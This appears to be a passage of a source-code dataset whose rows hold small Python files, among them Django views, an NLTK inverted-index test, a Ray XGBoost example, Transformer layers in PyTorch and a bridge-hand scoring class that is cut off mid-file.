blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 616 | content_id stringlengths 40 40 | detected_licenses listlengths 0 112 | license_type stringclasses 2 values | repo_name stringlengths 5 115 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 777 values | visit_date timestamp[us]date 2015-08-06 10:31:46 2023-09-06 10:44:38 | revision_date timestamp[us]date 1970-01-01 02:38:32 2037-05-03 13:00:00 | committer_date timestamp[us]date 1970-01-01 02:38:32 2023-09-06 01:08:06 | github_id int64 4.92k 681M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 22 values | gha_event_created_at timestamp[us]date 2012-06-04 01:52:49 2023-09-14 21:59:50 ⌀ | gha_created_at timestamp[us]date 2008-05-22 07:58:19 2023-08-21 12:35:19 ⌀ | gha_language stringclasses 149 values | src_encoding stringclasses 26 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 3 10.2M | extension stringclasses 188 values | content stringlengths 3 10.2M | authors listlengths 1 1 | author_id stringlengths 1 132 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
b17f118b3a48f23411c0605dccbd4d3d7d5ac331 | c75ec82316ed5322c5844912ce9c528c24360b9f | /nsd1903/devweb/day03/mysite/polls/views.py | 34549e6b8acdfc67276252944f7264401ca3a21a | [] | no_license | MrZhangzhg/nsd2019 | a94cde22f2e4bd648bb9e56ca63827f558f3c083 | 54f6d2c7b348a69f13ad5f38f2fbdc8207528749 | refs/heads/master | 2021-08-22T17:38:27.697675 | 2020-02-22T08:36:21 | 2020-02-22T08:36:21 | 183,539,489 | 21 | 24 | null | 2020-05-17T12:07:55 | 2019-04-26T02:06:16 | HTML | UTF-8 | Python | false | false | 1,327 | py | from django.shortcuts import render, redirect
from .models import Question
# Create your views here.
def index(request):
# django将会把http请求作为参数传递给函数,因此,函数必须至少有一个参数
# return HttpResponse('<h1>首页</h1>')
# 取出所有问题,根据pub_date降序排列
questions = Question.objects.order_by('-pub_date')
return render(request, 'index.html', {'questions': questions})
def detail(request, question_id):
question = Question.objects.get(id=question_id)
return render(request, 'detail.html', {'question': question})
def vote(request, question_id):
question = Question.objects.get(id=question_id)
# request是用户的请求,POST是请求中的字典,保存着提交数据
choice_id = request.POST.get('choice_id')
# 通过问题的选项集取出对应的选项实例
choice = question.choice_set.get(id=choice_id)
choice.votes += 1 # 选项票数加1
choice.save()
# 使用重定向,url将会变成result的url,如果仍然使用render
# 那么url显示的是vote,但是页面是result的页面
return redirect('result', question_id)
def result(request, question_id):
question = Question.objects.get(id=question_id)
return render(request, 'result.html', {'question': question})
| [
"zhangzg@tedu.cn"
] | zhangzg@tedu.cn |
e13ae8c45049850fbfbfea34c7cd6ba0fef4b00a | 86d464653092d40abdbd2a125cb29af4de6ca44c | /experiment_scripts/inverted_indexing_test.py | be874046001a92303bd48125366d31b2f0190f11 | [] | no_license | lws803/CS3245 | ad6003729ead0bf871e131ca0c74676001a66f6a | b4c85388bb017fb21a4ccee14096230aeccecde9 | refs/heads/master | 2020-04-19T03:26:12.737752 | 2019-06-16T16:02:12 | 2019-06-16T16:02:12 | 167,934,428 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,398 | py | from nltk.stem import *
from nltk.probability import FreqDist
import nltk
stemmer = PorterStemmer()
text = "penyetted penyet"
text1 = "penyet test helloed"
text2 = "penyetted hello"
texts = [text, text1, text2]
dictionary = {}
for i in range(0, 3):
for word in nltk.word_tokenize(texts[i]):
word = stemmer.stem(word) # Stem it first
if (word not in dictionary):
dictionary[word] = [i]
else:
if (i not in dictionary[word]):
dictionary[word].append(i)
# Porter stemmer can remove the -ed and -s etc etc
for items in dictionary:
print items, " ", dictionary[items]
# Texts are ordered by their index in increasing order
query1 = "penyet"
query2 = "hello"
query1 = stemmer.stem(query1)
query2 = stemmer.stem(query2)
queries = [[len(dictionary[query1]), query1], [len(dictionary[query2]), query2]]
queries.sort() # Sort the queries so we tackle the smallest one first
# We want to find a text which contains both penyet and hello
p1 = 0
p2 = 0
foundTexts = {}
# We can check both of them at the same time as their arrays are sorted
while (p1 < len(dictionary[queries[0][1]]) and p2 < len(dictionary[queries[1][1]])):
index1 = dictionary[queries[0][1]][p1]
index2 = dictionary[queries[1][1]][p2]
if (index1 < index2):
p1 += 1 # If index1 < index2 then we move p1 up
elif (index2 < index1):
p2 += 1 # vice versa for this one as well
elif (index1 == index2):
foundTexts[index1] = True
p1 += 1
p2 += 1
print foundTexts.keys()
# We want to find a text which contains penyet but not hello
foundTexts = {}
p1 = 0
p2 = 0
while (p1 < len(dictionary["penyet"]) and p2 < len(dictionary["hello"])):
index1 = dictionary["penyet"][p1]
index2 = dictionary["hello"][p2]
if (index1 < index2):
foundTexts[index1] = True # Here we use a set instead as the index could be added in multiple times
# If index1 < index2, means index2 does not contain the article we want, else they would have both been matched
# In this case, the second condition of !"hello" has to be found from the second pointer
p1 += 1
elif (index1 > index2):
p2 += 1
elif (index1 == index2):
p1 += 1
p2 += 1
foundTexts.pop(index1, None) # If found later on in the list, then just pop it off
print foundTexts.keys()
| [
"lws803@gmail.com"
] | lws803@gmail.com |
5f246ef3eb4100549c48eb0f4832a833d1d6a4ed | e6cce25fb4159112d5a395a63aa024ac409b40d2 | /CHALLENGES/100TASK/ex010.py | 1c683bf8551b6a15bd8a3464c23792719ddae1e6 | [] | no_license | batestin1/PYTHON | 729225e6f1db029ec1e725eced5fe89e884cccb4 | f7fb74dd755acf37920dee6a6f9e3663141232e9 | refs/heads/master | 2023-06-23T03:27:14.951229 | 2021-07-22T22:54:20 | 2021-07-22T22:54:20 | 370,337,387 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 388 | py | #Crie um programa que leia quanto dinheiro uma pessoa tem na carteira e mostre quantos dólares ela pode comprar.
import pandas
print('-*-'*30)
print('CONVERSAO DE DOLAR ')
print('Desenvolvido por Maycon Cypriano')
print('-*-'*30)
real = float(input('Quanto você tem na carteira: '))
dolar = real*0.18
print(f'Se você tem R$:{real} na carteira, então você tem USD:{round(dolar,2)}') | [
"mayconcipriano@gmail.com"
] | mayconcipriano@gmail.com |
882890653845d4203f7dbc442a563c4f17cbf708 | 19ca5093877d00b1cffcd0ec5c37e27ba2ceb347 | /lesson_03/task_2.py | a99b497abf4470a16621a728f53564a9eef35989 | [] | no_license | MichaelDc86/Algorythms | 10d424fb1bc667d088ecb7f8f01bf889ba2b6b22 | 072685eb045f0a29cc3abb7c008ef5677a7e5690 | refs/heads/master | 2020-05-15T23:57:41.608736 | 2019-05-29T06:39:35 | 2019-05-29T06:39:35 | 182,566,590 | 0 | 0 | null | 2019-05-29T06:39:36 | 2019-04-21T18:07:42 | Python | UTF-8 | Python | false | false | 943 | py | # Во втором массиве сохранить индексы четных элементов первого массива.
# Например, если дан массив со значениями 8, 3, 15, 6, 4, 2,
# второй массив надо заполнить значениями 1, 4, 5, 6 (или 0, 3, 4, 5, если индексация начинается с нуля),
# т.к. именно в этих позициях первого массива стоят четные числа.
import random
first = [random.randint(-99, 99) for _ in range(0, random.randint(1, 30))]
second = []
for position, i in enumerate(first):
if (i % 2) == 0:
second.append(position)
print(f'Первый массив случайных чисел: {first}')
print(f'Второй массив, содержащий индексы четных элементов первого(нумерация с "0"): {second}')
| [
"lenskymiwa@ya.ru"
] | lenskymiwa@ya.ru |
113e7e10a6f4f6f4126931c451a7af984bdf89c7 | b162de01d1ca9a8a2a720e877961a3c85c9a1c1c | /875.koko-eating-bananas.python3.py | 67a20e8d792a6529bc38998bc86ee2ac85df6a73 | [] | no_license | richnakasato/lc | 91d5ff40a1a3970856c76c1a53d7b21d88a3429c | f55a2decefcf075914ead4d9649d514209d17a34 | refs/heads/master | 2023-01-19T09:55:08.040324 | 2020-11-19T03:13:51 | 2020-11-19T03:13:51 | 114,937,686 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,378 | py | #
# [907] Koko Eating Bananas
#
# https://leetcode.com/problems/koko-eating-bananas/description/
#
# algorithms
# Medium (42.86%)
# Total Accepted: 7.6K
# Total Submissions: 17.7K
# Testcase Example: '[3,6,7,11]\n8'
#
# Koko loves to eat bananas. There are N piles of bananas, the i-th pile has
# piles[i] bananas. The guards have gone and will come back in H hours.
#
# Koko can decide her bananas-per-hour eating speed of K. Each hour, she
# chooses some pile of bananas, and eats K bananas from that pile. If the pile
# has less than K bananas, she eats all of them instead, and won't eat any more
# bananas during this hour.
#
# Koko likes to eat slowly, but still wants to finish eating all the bananas
# before the guards come back.
#
# Return the minimum integer K such that she can eat all the bananas within H
# hours.
#
#
#
#
#
#
#
# Example 1:
#
#
# Input: piles = [3,6,7,11], H = 8
# Output: 4
#
#
#
# Example 2:
#
#
# Input: piles = [30,11,23,4,20], H = 5
# Output: 30
#
#
#
# Example 3:
#
#
# Input: piles = [30,11,23,4,20], H = 6
# Output: 23
#
#
#
#
# Note:
#
#
# 1 <= piles.length <= 10^4
# piles.length <= H <= 10^9
# 1 <= piles[i] <= 10^9
#
#
#
#
#
#
class Solution:
def minEatingSpeed(self, piles, H):
"""
:type piles: List[int]
:type H: int
:rtype: int
"""
| [
"richnakasato@hotmail.com"
] | richnakasato@hotmail.com |
493992116f031f81f5b2f85c82bed18c7a906557 | 1a87ac9522591f25b03e6912ba3af3cca115abae | /authentication/views.py | babc97856be2925196aacd612175b88e59fbc097 | [
"MIT"
] | permissive | jyywong/InventoryMS | c67fdb0a051be5d136d9509e63b7fc0aeadcc324 | 9aac1324742730ce980e638f2156ece9eb44a593 | refs/heads/master | 2023-04-01T15:38:44.448813 | 2021-04-05T19:59:45 | 2021-04-05T19:59:45 | 350,162,598 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,802 | py | # -*- encoding: utf-8 -*-
"""
Copyright (c) 2019 - present AppSeed.us
"""
from django.shortcuts import render
# Create your views here.
from django.shortcuts import render, redirect
from django.contrib.auth import authenticate, login
from django.contrib.auth.models import User
from django.forms.utils import ErrorList
from django.http import HttpResponse
from .forms import LoginForm, SignUpForm
def login_view(request):
form = LoginForm(request.POST or None)
msg = None
if request.method == "POST":
if form.is_valid():
username = form.cleaned_data.get("username")
password = form.cleaned_data.get("password")
user = authenticate(username=username, password=password)
if user is not None:
login(request, user)
return redirect("lab_list")
else:
msg = 'Invalid credentials'
else:
msg = 'Error validating the form'
return render(request, "accounts/login.html", {"form": form, "msg" : msg})
def register_user(request):
msg = None
success = False
if request.method == "POST":
form = SignUpForm(request.POST)
if form.is_valid():
form.save()
username = form.cleaned_data.get("username")
raw_password = form.cleaned_data.get("password1")
user = authenticate(username=username, password=raw_password)
msg = 'User created - please <a href="/login">login</a>.'
success = True
#return redirect("/login/")
else:
msg = 'Form is not valid'
else:
form = SignUpForm()
return render(request, "accounts/register.html", {"form": form, "msg" : msg, "success" : success })
| [
"wong.jonathan1@gmail.com"
] | wong.jonathan1@gmail.com |
d7a27c6b64dc08597f96d3ab27d59a95797a6e40 | 47bd686ab04d8f6daba2097875dfefdba967d598 | /10_codeup/01_기초100제/01_1001.py | 4d64434c3fa4a6f2364f3dba450a59a5dc52733b | [] | no_license | EmjayAhn/DailyAlgorithm | 9633638c7cb7064baf26126cbabafd658fec3ca8 | acda1917fa1a290fe740e1bccb237d83b00d1ea4 | refs/heads/master | 2023-02-16T17:04:35.245512 | 2023-02-08T16:29:51 | 2023-02-08T16:29:51 | 165,942,743 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 55 | py | # https://codeup.kr/problem.php?id=1001
print('Hello') | [
"emjay.data@gmail.com"
] | emjay.data@gmail.com |
40295ccd9ae060f231a5bedae45d9838221b52a3 | 01431aec3d6084b77faa62eae962c3a5ce07621a | /attention_is_all_you_need.py | 55b5443194eae9da8406c6123bbfa512c29aff15 | [] | no_license | jiyali/python-target-offer | e952cc77b0b3c4e4c77f5b9f67ef61bd7413354c | 214176b25caffea647f87bf816d3d712293c7c7f | refs/heads/master | 2020-07-29T05:53:57.930631 | 2020-05-13T15:04:08 | 2020-05-13T15:04:08 | 209,690,069 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 7,112 | py | # #############input Embedding ###############
class Embeddings(nn.Module):
def __init__(self, d_model, vocab):
super(Embeddings, self).__init__()
self.lut = nn.Embedding(vocab, d_model)
self.d_model = d_model # 表示embedding的维度
def forward(self, x):
return self.lut(x) * math.sqrt(self.d_model)
# #############Positional Encoding############
class PositionalEncoding(nn.Module):
"实现PE功能"
def __init__(self, d_model, dropout, max_len=5000):
super(PositionalEncoding, self).__init__()
self.dropout = nn.Dropout(p=dropout)
pe = torch.zeros(max_len, d_model)
position = torch.arange(0., max_len).unsqueeze(1)
div_term = torch.exp(torch.arange(0., d_model, 2) *
-(math.log(10000.0) / d_model))
pe[:, 0::2] = torch.sin(position * div_term) # 偶数列
pe[:, 1::2] = torch.cos(position * div_term) # 奇数列
pe = pe.unsqueeze(0) # [1, max_len, d_model]
self.register_buffer('pe', pe)
def forward(self, x):
# 输入模型的整个Embedding是Word Embedding与Positional Embedding直接相加之后的结果
x = x + Variable(self.pe[:, :x.size(1)], requires_grad=False)
return self.dropout(x)
# 在位置编码下方,将基于位置添加正弦波。对于每个维度,波的频率和偏移都不同。
plt.figure(figsize=(15, 5))
pe = PositionalEncoding(20, 0)
y = pe.forward(Variable(torch.zeros(1, 100, 20)))
plt.plot(np.arange(100), y[0, :, 4:8].data.numpy())
plt.legend(["dim %d"%p for p in [4,5,6,7]])
# ###########MultiHeadAttention#################
class MultiHeadedAttention(nn.Module):
def __init__(self, h, d_model, dropout=0.1):
"Take in model size and number of heads."
super(MultiHeadedAttention, self).__init__()
assert d_model % h == 0
self.d_k = d_model // h
self.h = h
self.linears = clones(nn.Linear(d_model, d_model), 4)
self.attn = None
self.dropout = nn.Dropout(p=dropout)
def forward(self, query, key, value, mask=None):
"""
实现MultiHeadedAttention。
输入的q,k,v是形状 [batch, L, d_model]。
输出的x 的形状同上。
"""
if mask is not None:
# Same mask applied to all h heads.
mask = mask.unsqueeze(1)
nbatches = query.size(0)
# 1) 这一步qkv变化:[batch, L, d_model] ->[batch, h, L, d_model/h]
query, key, value = \
[l(x).view(nbatches, -1, self.h, self.d_k).transpose(1, 2)
for l, x in zip(self.linears, (query, key, value))]
# 2) 计算注意力attn 得到attn*v 与attn
# qkv :[batch, h, L, d_model/h] -->x:[b, h, L, d_model/h], attn[b, h, L, L]
x, self.attn = attention(query, key, value, mask=mask, dropout=self.dropout)
# 3) 上一步的结果合并在一起还原成原始输入序列的形状
x = x.transpose(1, 2).contiguous().view(nbatches, -1, self.h * self.d_k)
# 最后再过一个线性层
return self.linears[-1](x)
# ################Add&Norm#################
class LayerNorm(nn.Module):
"""构造一个layernorm模块"""
def __init__(self, features, eps=1e-6):
super(LayerNorm, self).__init__()
self.a_2 = nn.Parameter(torch.ones(features))
self.b_2 = nn.Parameter(torch.zeros(features))
self.eps = eps
def forward(self, x):
"Norm"
mean = x.mean(-1, keepdim=True)
std = x.std(-1, keepdim=True)
return self.a_2 * (x - mean) / (std + self.eps) + self.b_2
class SublayerConnection(nn.Module):
"""Add+Norm"""
def __init__(self, size, dropout):
super(SublayerConnection, self).__init__()
self.norm = LayerNorm(size)
self.dropout = nn.Dropout(dropout)
def forward(self, x, sublayer):
"add norm"
return x + self.dropout(sublayer(self.norm(x)))
# #############Feed-Forword Network###########
class PositionwiseFeedForward(nn.Module):
"实现FFN函数"
def __init__(self, d_model, d_ff, dropout=0.1):
super(PositionwiseFeedForward, self).__init__()
self.w_1 = nn.Linear(d_model, d_ff)
self.w_2 = nn.Linear(d_ff, d_model)
self.dropout = nn.Dropout(dropout)
def forward(self, x):
return self.w_2(self.dropout(F.relu(self.w_1(x))))
# ##########Encoder主架构的代码##############
def clones(module, N):
"产生N个相同的层"
return nn.ModuleList([copy.deepcopy(module) for _ in range(N)])
class Encoder(nn.Module):
"""N层堆叠的Encoder"""
def __init__(self, layer, N):
super(Encoder, self).__init__()
self.layers = clones(layer, N)
self.norm = LayerNorm(layer.size)
def forward(self, x, mask):
"每层layer依次通过输入序列与mask"
for layer in self.layers:
x = layer(x, mask)
return self.norm(x)
# ############Decoder的代码主要结构##############
# Decoder部分
class Decoder(nn.Module):
"""带mask功能的通用Decoder结构"""
def __init__(self, layer, N):
super(Decoder, self).__init__()
self.layers = clones(layer, N)
self.norm = LayerNorm(layer.size)
def forward(self, x, memory, src_mask, tgt_mask):
for layer in self.layers:
x = layer(x, memory, src_mask, tgt_mask)
return self.norm(x)
# ################mask#####################
def subsequent_mask(size):
"""
mask后续的位置,返回[size, size]尺寸下三角Tensor
对角线及其左下角全是1,右上角全是0
"""
attn_shape = (1, size, size)
subsequent_mask = np.triu(np.ones(attn_shape), k=1).astype('uint8')
return torch.from_numpy(subsequent_mask) == 0
# ##########Encoder-Decoder Multi-head Attention###################
class DecoderLayer(nn.Module):
"Decoder is made of self-attn, src-attn, and feed forward (defined below)"
def __init__(self, size, self_attn, src_attn, feed_forward, dropout):
super(DecoderLayer, self).__init__()
self.size = size
self.self_attn = self_attn
self.src_attn = src_attn
self.feed_forward = feed_forward
self.sublayer = clones(SublayerConnection(size, dropout), 3)
def forward(self, x, memory, src_mask, tgt_mask):
"将decoder的三个Sublayer串联起来"
m = memory
x = self.sublayer[0](x, lambda x: self.self_attn(x, x, x, tgt_mask))
x = self.sublayer[1](x, lambda x: self.src_attn(x, m, m, src_mask))
return self.sublayer[2](x, self.feed_forward)
# #########Linear and Softmax to Produce Output Probabilities############
class Generator(nn.Module):
"""
Define standard linear + softmax generation step。
定义标准的linear + softmax 生成步骤。
"""
def __init__(self, d_model, vocab):
super(Generator, self).__init__()
self.proj = nn.Linear(d_model, vocab)
def forward(self, x):
return F.log_softmax(self.proj(x), dim=-1) | [
"762115542@qq.com"
] | 762115542@qq.com |
e5d3bbcfe8a0f176cd05149a1ff34ab74cc535cf | e0980f704a573894350e285f66f4cf390837238e | /.history/flex/models_20201030102256.py | 24833cc279761223d63ee1229f3fb82f233a9c19 | [] | no_license | rucpata/WagtailWebsite | 28008474ec779d12ef43bceb61827168274a8b61 | 5aa44f51592f49c9a708fc5515ad877c6a29dfd9 | refs/heads/main | 2023-02-09T15:30:02.133415 | 2021-01-05T14:55:45 | 2021-01-05T14:55:45 | 303,961,094 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,537 | py | from django.db import models
from wagtail.core.models import Page
from wagtail.core.fields import StreamField
from wagtail.admin.edit_handlers import StreamFieldPanel
from wagtail.snippets.blocks import SnippetChooserBlock
from wagtail.images.blocks import ImageChooserBlock
from wagtail.core import blocks as wagtail_blocks
from streams import blocks
from home.models import new_table_options
class FlexPage(Page):
parent_page_type = ["home.H"]
body = StreamField([
('title', blocks.TitleBlock()),
('cards', blocks.CardsBlock()),
('image_and_text', blocks.ImageAndTextBlock()),
('cta', blocks.CallToActionBlock()),
('testimonial', SnippetChooserBlock(
target_model='testimonials.Testimonial',
template = 'streams/testimonial_block.html'
)),
('pricing_table', blocks.PricingTableBlock(
table_options=new_table_options,
)),
('richtext', wagtail_blocks.RichTextBlock(
template = 'streams/simple_richtext_block.html',
features = ['bold', 'italic', 'ol', 'ul', 'link']
)),
('large_image', ImageChooserBlock(
help_text = 'Ten obraz będzie przycięty do 1200px na 775px',
template='streams/large_image_block.html'
))
], null=True, blank=True)
content_panels = Page.content_panels + [
StreamFieldPanel('body'),
]
class Meta:
verbose_name = 'Flex (misc) page'
verbose_name_plural = 'Flex (misc) pages' | [
"rucinska.patrycja@gmail.com"
] | rucinska.patrycja@gmail.com |
e2f4b4e6ea3c3f336a0d95eb369d269665bf9fb9 | b3699724907850fd26cbce4509fec83a33b89760 | /python/ray/util/xgboost/simple_example.py | f8881e75d0f5f6391b2239475889122141e005b5 | [
"Apache-2.0",
"MIT"
] | permissive | BonsaiAI/ray | 5e2f26a81d865a795261d11f9182aca7f07c7b97 | 941d30f082fe879ea30618af14327c25b5a21a74 | refs/heads/master | 2023-06-12T05:15:29.370188 | 2021-05-06T07:03:53 | 2021-05-06T07:03:53 | 233,708,687 | 3 | 5 | Apache-2.0 | 2023-05-27T08:06:37 | 2020-01-13T22:41:47 | Python | UTF-8 | Python | false | false | 1,114 | py | from sklearn import datasets
from sklearn.model_selection import train_test_split
from ray.util.xgboost import RayDMatrix, RayParams, train
# __xgboost_begin__
def main():
# Load dataset
data, labels = datasets.load_breast_cancer(return_X_y=True)
# Split into train and test set
train_x, test_x, train_y, test_y = train_test_split(
data, labels, test_size=0.25)
train_set = RayDMatrix(train_x, train_y)
test_set = RayDMatrix(test_x, test_y)
# Set config
config = {
"tree_method": "approx",
"objective": "binary:logistic",
"eval_metric": ["logloss", "error"],
"max_depth": 3,
}
evals_result = {}
# Train the classifier
bst = train(
config,
train_set,
evals=[(test_set, "eval")],
evals_result=evals_result,
ray_params=RayParams(max_actor_restarts=1, num_actors=1),
verbose_eval=False)
bst.save_model("simple.xgb")
print("Final validation error: {:.4f}".format(
evals_result["eval"]["error"][-1]))
# __xgboost_end__
if __name__ == "__main__":
main()
| [
"noreply@github.com"
] | BonsaiAI.noreply@github.com |
df9cff14fdbf62a866cf77be1ff6d7b3f37cd1d0 | 236498cd8daf971ef53cd120051d76c72474330d | /fetch-gazettes.py | 4e65868eecf60ad83be066f8f9e8b4c0e60b7522 | [] | no_license | OpenUpSA/saflii-gazettes | 2106130e1e0dac45a630f4e26f583c56879bc9f2 | 12d25bf00c47d6f9e4d3950e0ef2373bd17c5589 | refs/heads/master | 2021-10-23T21:53:06.583034 | 2019-03-20T08:54:54 | 2019-03-20T08:54:54 | 81,817,880 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,110 | py | #!/usr/bin/env python
#
# Script to generate Registry.txt and pdf-urls.txt for gazettes from opengazettes.org.za
import json
import os
import os.path
entries = []
urls = []
# what jurisdiction code should we use?
with open("jurisdiction.txt") as f:
jurisdiction = f.read().strip()
print "Only using gazettes for jurisdiction code: %s" % jurisdiction
# generate an entry for each gazette entry
with open("gazette-index-latest.jsonlines", "r") as f:
for line in f:
gazette = json.loads(line)
if gazette['jurisdiction_code'] != jurisdiction:
continue
fname = os.path.basename(gazette['archive_url'])
urls.append(gazette['archive_url'])
entries.append('"%s" (%s) %s' % (fname, gazette['publication_date'], gazette['issue_title']))
# write the new registry
with open("Registry.txt.new", "w") as f:
f.write("\n".join(entries))
# write the new urls
with open("pdf-urls.txt.new", "w") as f:
f.write("\n".join(urls))
# atomically rename the files
os.rename("Registry.txt.new", "Registry.txt")
os.rename("pdf-urls.txt.new", "pdf-urls.txt")
| [
"greg@kempe.net"
] | greg@kempe.net |
71fa9d5981516b87f29091fb9f9f3d80fb0b2f7b | 5dbb41859b177778b124d9f9ca5828ca8a5c529e | /aula10.py | e2d96a78cc4c84dc93ff526ed17ee6e25fbbf947 | [] | no_license | hevalenc/Curso_DIO_Python_basico | 4d7163a7496d17ec248472b075bfbb0988412d26 | 59a1e2aabc98f7bc3db49eea16170974fd75e9a3 | refs/heads/main | 2023-03-21T05:29:37.847492 | 2021-03-18T16:25:22 | 2021-03-18T16:25:22 | 349,142,834 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,628 | py | #o 'datetime' é uma biblioteca do python, o comando 'strftime' serve para usar a biblioteca de data e hora
#'%d/%m/%y' e '%A %B %Y' são diretivas para definir o formato de exibição de data
#'%H:%M:%S' diretiva para horas,
from datetime import date, time, datetime, timedelta
def trabalhando_com_datetime():
data_atual = datetime.now()
print(data_atual)
print(data_atual.strftime('%d/%m/%Y %H:%M:%S'))
print(data_atual.strftime('%c'))
print(data_atual.day)
print(data_atual.weekday())
tupla = ('segunda', 'terça', 'quarta', 'quinta', 'sexta', 'sábado', 'domingo')
print(tupla[data_atual.weekday()])
#foi usado a tupla para chamar o dia da semana, como no exemplo
data_criada = datetime(2018, 6, 20, 15, 30, 20)
print(data_criada.strftime('%c'))
data_string = '01/01/2019 12:20:22'
data_convertida = datetime.strptime(data_string, '%d/%m/%Y %H:%M:%S')
print(data_convertida)
nova_data = data_convertida - timedelta(days=365, hours=2)
print(nova_data)
nova_data1 = data_convertida + timedelta(days=365, hours=2)
print(nova_data1)
def trabalhando_com_date():
data_atual = date.today()
data_atual_str = data_atual.strftime('%A %B %Y')
print(type(data_atual))
print(data_atual_str)
print(type(data_atual_str))
#print(data_atual.strftime('%d/%m/%y'))
def trabalhando_com_time():
horario = time(hour=15, minute=18, second=30)
print(horario)
horario_str = horario.strftime('%H:%M:%S')
print(horario_str)
if __name__ == '__main__':
trabalhando_com_date()
trabalhando_com_time()
trabalhando_com_datetime()
| [
"heitorvalenca7@gmail.com"
] | heitorvalenca7@gmail.com |
63b17fc4261dad20778c5a4e48aa81f3868daa44 | fcdce57c1bd0cc4f52679fd0f3f82532550083fa | /282/bridgehand.py | 9b5c320bf36248545d8ba244453ecaab726c4014 | [] | no_license | nishanthegde/bitesofpy | a16a8b5fb99ab18dc1566e606170464a4df3ace0 | c28aa88e1366ab65f031695959d7cd0b3d08be6b | refs/heads/master | 2023-08-08T16:53:17.107905 | 2023-07-22T19:07:51 | 2023-07-22T19:07:51 | 183,959,400 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 7,209 | py | from enum import Enum
import typing
from dataclasses import dataclass, field
from collections import namedtuple, defaultdict
from collections.abc import Sequence
import random
from typing import List
from random import shuffle
suits = list("SHDC")
ranks = list("AKQJT98765432")
Suit = Enum("Suit", suits)
Rank = Enum("Rank", ranks)
Card = namedtuple("Card", ["suit", "rank"])
HCP = {Rank.A: 4, Rank.K: 3, Rank.Q: 2, Rank.J: 1}
SSP = {2: 1, 1: 2, 0: 3} # cards in a suit -> short suit points
@dataclass
class TestHand:
card_string: str
doubletons: int
singletons: int
voids: int
hcp: int
ssp: int
total_points: int
ltc: int
card_list: List[Card] = field(init=False)
def __post_init__(self):
""" Generate actual list of Card instances from card_string """
self.card_list = []
for suit_holding in self.card_string.split():
suit = Suit[suit_holding[0]]
for rank in suit_holding[2:]:
card = Card(suit, Rank[rank])
self.card_list.append(card)
shuffle(self.card_list)
test_hands = [
TestHand("S:AKJ H:QJT9 D:5432 C:AK", 1, 0, 0, 18, 1, 19, 6),
TestHand("S:A76 H:KT75 D:KQ2 C:AK8", 0, 0, 0, 19, 0, 19, 6),
TestHand("S:AKQJT98765432", 0, 0, 3, 10, 9, 19, 0),
TestHand("S:5432 H:5432 D:543 C:32", 1, 0, 0, 0, 1, 1, 11),
TestHand("S:K642 H:Q985 D:AT64 C:4", 0, 1, 0, 9, 2, 11, 7),
TestHand("S:KQ3 H:Q76 D:J43 C:J987", 0, 0, 0, 9, 0, 9, 9),
TestHand("S:A64 H:72 D:KJ8542 C:AJ", 2, 0, 0, 13, 2, 15, 7),
TestHand("S:AT4 H:86 D:A984 C:AKT7", 1, 0, 0, 15, 1, 16, 7),
TestHand("S:J972 H:9 D:98742 C:T54", 0, 1, 0, 1, 2, 3, 10),
TestHand("S:9854 H:K43 D:Q5 C:9873", 1, 0, 0, 5, 1, 6, 10),
TestHand("S:KT943 H:T63 D:JT5 C:97", 1, 0, 0, 4, 1, 5, 10),
TestHand("S:T9732 H:J86 D:K93 C:86", 1, 0, 0, 4, 1, 5, 10),
TestHand("S:KT8 H:94 D:AJT4 C:6532", 1, 0, 0, 8, 1, 9, 9),
TestHand("S:AQT92 H:J763 D:763 C:6", 0, 1, 0, 7, 2, 9, 8),
TestHand("S:AK94 H:K743 D:AKT C:72", 1, 0, 0, 17, 1, 18, 6),
TestHand("S:A974 D:AK94 C:QJ932", 0, 0, 1, 14, 3, 17, 5),
TestHand("S:J873 H:KJ62 D:A96 C:K8", 1, 0, 0, 12, 1, 13, 8),
TestHand("S:T732 H:T2 D:JT8 C:AK96", 1, 0, 0, 8, 1, 9, 9),
TestHand("S:KT H:AK975 D:QJT2 C:KJ", 2, 0, 0, 17, 2, 19, 5),
TestHand("S:KJT97 H:AQ843 D:86 C:5", 1, 1, 0, 10, 3, 13, 6)
]
class BridgeHand:
def __init__(self, cards: typing.Sequence[Card]):
"""
Process and store the sequence of Card objects passed in input.
Raise TypeError if not a sequence
Raise ValueError if any element of the sequence is not an instance
of Card, or if the number of elements is not 13
"""
if not isinstance(cards, Sequence):
raise TypeError("BridgeHand object must be initiated with card sequence")
elif len(cards) != 13:
raise ValueError("Card sequence must have 13 cards")
elif not all(isinstance(x, Card) for x in cards):
raise ValueError("Card sequence can have only card objects")
else:
self.cards = cards
def __str__(self) -> str:
"""
Return a string representing this hand, in the following format:
"S:AK3 H:T987 D:KJ98 C:QJ"
List the suits in SHDC order, and the cards within each suit in
AKQJT..2 order.
Separate the suit symbol from its cards with a colon, and
the suits with a single space.
Note that a "10" should be represented with a capital 'T'
"""
ret = ''
ret_dict = defaultdict(list)
for c in self.cards:
ret_dict[str(c.suit.name)].append(str(c.rank.name))
for s in sorted(ret_dict, key=lambda x: Suit[x].value):
ret += "{}:{} ".format(s, ''.join(sorted(ret_dict[s], key=lambda x: Rank[x].value)))
return "{}".format(ret.strip())
@property
def hcp(self) -> int:
""" Return the number of high card points contained in this hand """
hcp = 0
for suit_holding in self.__str__().split():
for c in suit_holding.strip().split(':')[1]:
if c == 'A':
hcp += 4
if c == 'K':
hcp += 3
if c == 'Q':
hcp += 2
if c == 'J':
hcp += 1
return hcp
@property
def doubletons(self) -> int:
""" Return the number of doubletons contained in this hand """
doubletons = 0
for suit_holding in self.__str__().split():
if len(suit_holding.strip().split(':')[1]) == 2:
doubletons += 1
return doubletons
@property
def singletons(self) -> int:
